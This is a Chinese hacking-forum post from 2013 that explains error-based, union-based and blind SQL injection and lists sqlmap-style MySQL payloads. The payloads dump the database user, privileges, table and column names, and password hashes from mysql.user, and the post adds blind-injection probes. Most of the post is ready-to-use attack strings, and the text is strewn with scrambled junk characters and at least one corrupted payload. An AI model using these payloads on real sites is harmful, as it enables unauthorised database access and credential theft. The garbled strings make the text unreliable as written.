找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2225|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。( O$ G; a" }8 d; |

& e2 w6 H4 |# O1 v; k5 B7 L. C这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表- ^: a5 ~8 R- [' ^
( r! ~3 e$ p2 [6 U9 G6 m
分类标准        分类        备注! X: v3 B# n. O# M# d$ {; i7 F: F
按字段类型        整型注入,字符型注入       
. ?/ ^8 g* g8 J$ d: ~; c  Y- }$ Y按出现的位置        get注入,post注入,cookie注入,http header注入       
$ V/ Y0 d; Z: ]然而高级注入是这样的
! z3 b, c" l8 M9 D, A% F
; H0 w) W* I) G3 `高级注入分类        条件
/ O+ A8 }0 H, |. ~& y0 Cerror-based sql        数据库的错误回显可以返回,存在数据库,表结构
+ ]7 o( J2 Q% W/ t  O9 O) Munion-based sql        能够使用union,存在数据库,表结构
& Q) K+ I8 ^3 F3 V! @blind sql        存在注入+ L' l" e& X1 `- N9 p  ~- F( s4 E
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
/ c; }# ]0 f" ~7 J5 K
1 W, R& E1 Z  n  i) Z( S% P好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
( y& ?# H5 {( o/ j2 \: ?
& y0 @  l7 p( p2 a8 Z# e2 U附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。2 p( c& b. U: ?5 y

* [6 N1 c! r/ E这里用mysql说明
, I( c' q! J( X5 `# X# Q0 j6 J 7 J7 \5 ^6 s6 w3 T# X2 j. y: A
e注入坛子里很多了,请看戳我或者再戳我2 q6 t3 A  _4 k5 v
4 V3 u) T6 I$ a- E7 e
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
# J- ~3 a  C  i' A6 R$ m( K7 c   c' @" T: L8 D7 L: K8 a* {/ _
获取当前数据库用户名
1 e; D9 Q- t( J" g* ~3 n
: }. _2 N7 p+ V) uUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C9 _  k) i6 U. `! K2 l/ \* v  U
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL( L* J  ?# A4 A% e
L, NULL#
6 b& V' V7 N% J1 ?" b注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。. K! f% _. N% U7 O% T# z

- [% ]8 s# u/ }获取数据库名
( c- ]8 }  f/ `1 D! j* P
! w' t0 G! p9 Q$ i1 g3 TUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#, g& i$ p+ u& J: c
获取所有用户名
. R2 e* A( y5 v1 I$ ^5 | - q3 g& A$ K+ Y6 j, D. p+ _
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#  {+ z0 D3 X1 @3 ^9 o" ~5 C
查看当前用户权限
/ {) c9 o4 G; B, G4 P" s * p( }7 c: y. h# o- r* z! K
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#* ^9 w( s* k! e. x, j
尝试获取密码,当然需要有能读mysql数据库的权限2 `8 R3 g1 w7 E

8 b" `$ L2 w2 [( F* e. G4 ~2 FUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#. `5 n( p: S  x6 |
获取表名,limit什么的自己搞啦& [& m- K2 E: y. i6 b
" i, f1 H- ~0 y/ `$ `
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#3 f  F) M" U7 y# v( _9 r* L
获取字段名及其类型9 u" Z. [( ~- R" ?& g
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#& |2 ^7 t0 }, c  `
1 ]: h2 d$ G, f' F. Y
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
, ]4 `& D; y# ^, d% Y
' N2 |5 w0 l$ n3 X8 |0 M3 s0 ~$ i如:
! `4 x: ]. ?' @6 J, g1 d获取当前用户名
+ F# X0 @0 {1 ~
* e) g8 l, i7 E$ B1 E/ {& }AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
- R9 i( r( Y; N获取当前数据库
  h1 |- a  l0 [" C7 e* D 8 w( h3 R' m1 L( d( c" [
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 1069 S2 C8 B, Z1 K( ~$ x
获取表名
- t# g: `: `1 J: x
' N6 J/ Q$ Z* CAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 510 l( u& N0 Q" ~
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。7 j+ }6 l( M( k3 p% W
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
0 D. h8 `2 j9 d- A2 b爆表
' X  ]) ]) w0 E$ I0 b5 N
" }. H7 B% b) ]AND EXISTS(select * from table)
5 B" {* V* q5 j' w" {- d爆字段8 L" L. ~. O3 X( L( A. t6 b
8 q; o% I* }$ |2 X
AND EXISTS(select pwd from table)' W  D- P3 J$ M2 D: |
盲注的变化就比较多了,由于篇幅,只是举个例子而已。' W0 r& Y  Z8 a! A9 p. }" F
. g. |: b7 C. C; I: Q4 i
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。/ U/ Y) d2 u; w/ h  P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表